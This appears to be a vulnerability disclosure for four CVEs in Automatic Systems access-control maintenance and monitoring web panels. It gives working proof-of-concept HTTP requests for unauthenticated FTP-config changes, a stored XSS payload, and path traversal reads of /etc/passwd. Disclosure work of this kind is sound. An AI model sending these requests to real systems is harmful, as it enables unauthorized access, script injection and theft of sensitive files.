Multiple Vulnerabilities Discovered in Automatic Systems Software

The below CVEs affect Automatic Systems Maintenance - SlimLane - 29565_d74ecce0c1081d50546db573a499941b10799fb7.

CVE-2024-48822 - Privilege escalation in Automatic Systems Maintenance at FtpConfig.php

It is possible to force browse to FtpConfig.php. This allows an attacker to to both get and set the FTP configuration details, as well as use the tester functionality.

Below shows an example POST request to update the FTP config:

POST /FtpConfig.php HTTP/1.1
Host: <IP>
Content-Length: 106
Accept-Language: en-US,en;q=0.9
User-Agent: Mozilla/5.0
Connection: keep-alive

{"fct":"save_ftp_config","enabled":true,"host":"badhost","user":"myuser","password":"mypass"}

CVE-2024-48821 - Stored Cross Site Scripting vulnerability in Automatic Systems Maintenance at FtpConfig.php

The FtpConfig.php page does not sanitize inputs, and this allows an attacker to insert XSS payloads in the host, user, and password fields which persists on save.

POST /FtpConfig.php HTTP/1.1
Host: <IP>
Content-Length: 200
Accept-Language: en-US,en;q=0.9
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.6613.120 Safari/537.36
Connection: keep-alive

{"fct":"save_ftp_config","enabled":true,"host":"\"><script>alert(document.domain)</script>","user":"\"><script>alert(document.domain)</script>","password":"\"><script>alert(document.domain)</script>"}

Upon revisiting the page, it will execute the script:

This payload will also trigger for logged in users who visit the FTP configuration.

CVE-2024-48823 -  LFI in Automatic Systems Maintenance via the PassageAutoServer.php page

It's possible to use the file parameter on PassageAutoServer.php to gain access to sensitive files outside of the website directory:

GET /PassageAutoServer.php?getImg=1&file=/etc/passwd HTTP/1.1
Host: <IP>
Accept-Language: en-US,en;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.6613.120 Safari/537.36
Connection: keep-alive
The below CVE affects Automatic Systems Monitoring Panel - v02 r05 hf1 (svn:22519)

CVE-2024-48824 -  LFI in Automatic Systems Monitoring Panel via the download-file.php page

By crafting a request to download-file.php with the directory specified in the Racine parameter, and the file in the FileName parameter, it is possible to gain access to sensitive files on the operating system, outside of the web directory.

GET /download-file.php?Racine=/etc&FileName=passwd HTTP/1.1
Host: <IP>
Accept-Language: en-US,en;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.6613.120 Safari/537.36
Connection: keep-alive